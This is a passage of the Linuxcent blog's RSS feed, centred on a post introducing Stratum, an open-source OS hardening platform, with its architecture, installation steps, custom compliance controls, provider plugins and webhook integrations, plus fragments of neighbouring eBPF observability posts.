<p><em>Next: <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon — when the kernel says no</a></em></p>
<p>Get EP12 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&#038;title=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" data-a2a-url="https://linuxcent.com/ebpf-dns-observability-kubernetes/" data-a2a-title="DNS at the Kernel Level — What Your Pods Are Actually Resolving"></a></p><p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-dns-observability-kubernetes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1840</post-id>	</item>
		<item>
		<title>Stratum — OS Hardening as a Platform</title>
		<link>https://linuxcent.com/stratum-os-hardening-platform/</link>
					<comments>https://linuxcent.com/stratum-os-hardening-platform/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sun, 31 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[Infrastructure as Code]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[OS Hardening]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1834</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span>Stratum — open-core (Apache 2.0) OS hardening platform: declare baselines in YAML, build across six clouds, and gate CI/CD deployments on compliance grade.</p>
<p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel. position:relative anchors the absolutely
   positioned .lc-copy-btn and .lc-lang-badge that the script inserts. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code inside a pre resets it to inherit the panel. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent per language group, keyed on the data-lang attribute
   that the accompanying script sets on each pre. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: top-right corner of the pre, invisible (opacity:0) until the pre is hovered. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
/* .copied is toggled by the script for the "Copied!" state. */
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: top-left corner, also revealed on hover; pointer-events:none
   keeps it from intercepting clicks and text selection. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: collapsed borders, shaded header, zebra-striped even rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
// Code-block enhancer for article <pre> elements: records the language in a
// data-lang attribute, inserts a language badge, and appends a "Copy" button.
(function(){
  // Run-once guard: bail out if an earlier copy of this script already ran.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorates every <pre> present in the document at call time.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      // Language is taken from a "language-xxx" class on the inner <code>, if any.
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      // Explicit type: a bare <button> defaults to "submit" when nested in a form.
      btn.type='button';
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=sourceText(pre,code,btn);
        // Prefer the async Clipboard API; fall back to execCommand when it is
        // unavailable, the context is not secure, or the write is rejected.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Returns the text to copy: the inner <code> when present, otherwise the
  // <pre> itself. The button is a child of the <pre>, so it is hidden while
  // innerText is read (innerText skips non-rendered elements); otherwise its
  // "Copy" label would end up in the copied text.
  function sourceText(pre,code,btn){
    if(code)return code.innerText;
    btn.style.display='none';
    var text=pre.innerText;
    btn.style.display='';
    return text;
  }
  // Success feedback: "Copied!" plus the .copied class for two seconds.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: error label for two seconds.
  function failed(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Legacy copy path: select the text in an off-screen textarea and run the
  // "copy" command. The textarea is always removed again, and success is only
  // reported when execCommand actually returned true.
  function fb(text,btn){
    var ta=null,copied=false;
    try{
      ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      // execCommand signals an unsupported/disabled command by returning false, not by throwing.
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{
      if(ta&&ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{failed(btn);}
  }
  // Run now if the DOM is already parsed, otherwise wait for DOMContentLoaded.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 6</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · <a href="/automated-openscap-compliance-cis/">Automated OpenSCAP Compliance</a> · <a href="/cicd-compliance-gate-hardened-images/">CI/CD Compliance Gate</a> · </em><strong>Stratum Platform</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub</li>
<li>The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable</li>
<li>Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations</li>
<li>Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API</li>
<li>The series taught the user-facing interface for five episodes; EP06 covers what&#8217;s underneath and how to build on it</li>
<li>Installation is a single <code class="" data-line="">helm install</code> or <code class="" data-line="">docker compose up</code> — the platform runs in your environment</li>
</ul>
<hr />
<h2 id="the-series-arc-inverted">The Series Arc, Inverted</h2>
<p>EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:</p>
<pre><code class="" data-line="">EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)
</code></pre>
<p>For five episodes, you&#8217;ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.</p>
<hr />
<p>I&#8217;ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.</p>
<p>The tools exist. <code class="" data-line="">ansible-lockdown</code> applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn&#8217;t the tooling — it&#8217;s the integration layer that ties them together into a reproducible, auditable pipeline.</p>
<p>Stratum is that integration layer, open-sourced.</p>
<p>The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there&#8217;s no step to skip.</p>
<hr />
<h2 id="the-architecture">The Architecture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴───────────┐
           ▼                      ▼
  ┌──────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘
</code></pre>
<p>Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.</p>
<hr />
<h2 id="installation">Installation</h2>
<p>Stratum runs as a set of containers. Either Kubernetes or Docker Compose works.</p>
<p><strong>Kubernetes (Helm):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m
</code></pre>
<p><strong>Docker Compose (single-node):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080
</code></pre>
<hr />
<h2 id="the-three-extension-points">The Three Extension Points</h2>
<h3 id="1-custom-compliance-controls">1. Custom Compliance Controls</h3>
<p>Add controls that aren&#8217;t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:</p>
<pre><code class="" data-line=""># controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: &quot;grep -E &#039;^max_log_file_action&#039; /etc/audit/auditd.conf&quot;
  expected: &quot;max_log_file_action = keep_logs&quot;
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: &#039;^max_log_file_action&#039;
        line: &#039;max_log_file_action = keep_logs&#039;
</code></pre>
<p>Deploy the custom control:</p>
<pre><code class="" data-line="">stratum controls deploy --file controls/custom-audit-policy.yaml
</code></pre>
<p>Reference it in any blueprint:</p>
<pre><code class="" data-line="">compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001
</code></pre>
<p>Custom controls appear in the grade calculation and SARIF output alongside CIS controls.</p>
<h3 id="2-provider-plugins">2. Provider Plugins</h3>
<p>Add support for a new cloud provider by implementing the provider interface:</p>
<pre><code class="" data-line=""># providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = &quot;my-cloud&quot;

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...
</code></pre>
<p>Register the plugin:</p>
<pre><code class="" data-line="">stratum providers register --file providers/custom_provider.py --name my-cloud
</code></pre>
<p>The provider is now available as <code class="" data-line="">--provider my-cloud</code> in all <code class="" data-line="">stratum build</code> commands.</p>
<h3 id="3-pipeline-integrations">3. Pipeline Integrations</h3>
<p>Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:</p>
<pre><code class="" data-line=""># Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}
</code></pre>
<hr />
<h2 id="the-open-core-model">The Open-Core Model</h2>
<p>Stratum follows the same model as the tools that have become infrastructure standards:</p>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Open-core model</th>
</tr>
</thead>
<tbody>
<tr>
<td>Terraform / OpenTofu</td>
<td>Core OSS, enterprise features in paid tier</td>
</tr>
<tr>
<td>Cilium / Isovalent</td>
<td>Core OSS, enterprise support/features in paid tier</td>
</tr>
<tr>
<td>Vault / HCP Vault</td>
<td>Core OSS, hosted/enterprise in paid tier</td>
</tr>
<tr>
<td><strong>Stratum</strong></td>
<td>Engine + blueprint + scanner + Pipeline API: Apache 2.0</td>
</tr>
</tbody>
</table>
<p>Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.</p>
<p>The repository is at: <strong>github.com/rrskris/Stratum</strong></p>
<hr />
<h2 id="what-this-series-taught">What This Series Taught</h2>
<p>EP01 — EP06 in one view:</p>
<table>
<thead>
<tr>
<th>Episode</th>
<th>What you learned</th>
<th>What Stratum does</th>
</tr>
</thead>
<tbody>
<tr>
<td>EP01</td>
<td>Default AMIs are insecure by design</td>
<td>Replaces default AMI with a hardened golden image</td>
</tr>
<tr>
<td>EP02</td>
<td>Blueprint as code — the 2am skip disappears</td>
<td>HardeningBlueprint YAML — 5-step wizard or direct YAML</td>
</tr>
<tr>
<td>EP03</td>
<td>One blueprint, six providers, no drift</td>
<td>6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox</td>
</tr>
<tr>
<td>EP04</td>
<td>Automated OpenSCAP — grade at build time</td>
<td>Compliance Scanner: A-F, SARIF, drift detection</td>
</tr>
<tr>
<td>EP05</td>
<td>CI/CD gate — the unhardened image never deploys</td>
<td>Pipeline API: <code class="" data-line="">POST /api/pipeline/scan</code></td>
</tr>
<tr>
<td>EP06</td>
<td>The platform — OSS, self-hostable, extendable</td>
<td>Apache 2.0, Helm install, three extension points</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.</p>
<p>If you&#8217;ve been following the <a href="/ebpf-from-kernel-to-cloud/">eBPF: From Kernel to Cloud series</a>, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.</p>
<p>The next series: <strong>Purple Team Playbook</strong> — real attack paths against cloud and Kubernetes infrastructure, how they&#8217;re detected, and how they&#8217;re closed. Starting May 8.</p>
<p>GitHub: <a href="https://github.com/rrskris/Stratum">github.com/rrskris/Stratum</a></p>
<p>Get the Purple Team series in your inbox → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" 
href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&#038;title=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" data-a2a-url="https://linuxcent.com/stratum-os-hardening-platform/" data-a2a-title="Stratum — OS Hardening as a Platform"></a></p><p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/stratum-os-hardening-platform/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1834</post-id>	</item>
		<item>
		<title>Network Flow Observability — What Every Connection Reveals</title>
		<link>https://linuxcent.com/ebpf-network-flow-observability/</link>
					<comments>https://linuxcent.com/ebpf-network-flow-observability/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 29 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Cilium]]></category>
		<category><![CDATA[Flow Telemetry]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network Observability]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[TC eBPF]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1838</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span>See every TCP connection, retransmit, and dropped packet across your cluster using eBPF TC hooks — the kernel-level flow telemetry that APM tools interpret, not originate.</p>
<p>The post <a href="https://linuxcent.com/ebpf-network-flow-observability/">Network Flow Observability — What Every Connection Reveals</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel. position:relative anchors the absolutely
   positioned .lc-copy-btn and .lc-lang-badge that the script inserts. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code inside a pre resets it to inherit the panel. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent per language group, keyed on the data-lang attribute
   that the accompanying script sets on each pre. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: top-right corner of the pre, invisible (opacity:0) until the pre is hovered. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
/* .copied is toggled by the script for the "Copied!" state. */
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: top-left corner, also revealed on hover; pointer-events:none
   keeps it from intercepting clicks and text selection. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: collapsed borders, shaded header, zebra-striped even rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
// Code-block enhancer for article <pre> elements: records the language in a
// data-lang attribute, inserts a language badge, and appends a "Copy" button.
(function(){
  // Run-once guard: bail out if an earlier copy of this script already ran.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorates every <pre> present in the document at call time.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      // Language is taken from a "language-xxx" class on the inner <code>, if any.
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      // Explicit type: a bare <button> defaults to "submit" when nested in a form.
      btn.type='button';
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=sourceText(pre,code,btn);
        // Prefer the async Clipboard API; fall back to execCommand when it is
        // unavailable, the context is not secure, or the write is rejected.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Returns the text to copy: the inner <code> when present, otherwise the
  // <pre> itself. The button is a child of the <pre>, so it is hidden while
  // innerText is read (innerText skips non-rendered elements); otherwise its
  // "Copy" label would end up in the copied text.
  function sourceText(pre,code,btn){
    if(code)return code.innerText;
    btn.style.display='none';
    var text=pre.innerText;
    btn.style.display='';
    return text;
  }
  // Success feedback: "Copied!" plus the .copied class for two seconds.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: error label for two seconds.
  function failed(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
